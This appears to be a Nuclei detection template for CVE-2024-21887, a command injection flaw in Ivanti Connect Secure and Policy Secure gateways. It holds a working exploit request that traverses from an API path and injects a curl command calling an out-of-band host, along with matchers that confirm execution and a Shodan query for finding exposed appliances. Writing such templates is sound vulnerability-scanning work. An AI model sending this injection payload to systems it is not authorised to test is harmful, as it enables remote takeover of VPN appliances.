id: CVE-2024-21887 info: name: Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection author: pdresearch,parthmalhotra,iamnoooob severity: critical description: A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance. reference: - https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2024-21887 cwe-id: CWE-77 cpe: cpe:2.3:a:ivanti:connect_secure:9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: ivanti product: "connect_secure" shodan-query: "html:\"welcome.cgi?p=logo\"" tags: cve,cve2024,kev,rce,ivanti http: - raw: - | GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: header words: - 'application/json' - type: word part: body words: - '"result":' - '"message":' condition: and # digest: 4a0a00473045022100dab064fbfcec3c4409bbb850f630e520716cb2d44e7c7db8e2bb15f21b469d690220189dc9cd26e19e0bb3683dd323e4f2cf63107d3e9b0385ebf054ce4b8c6823b3:922c64590222798bb761d5b6d8e72950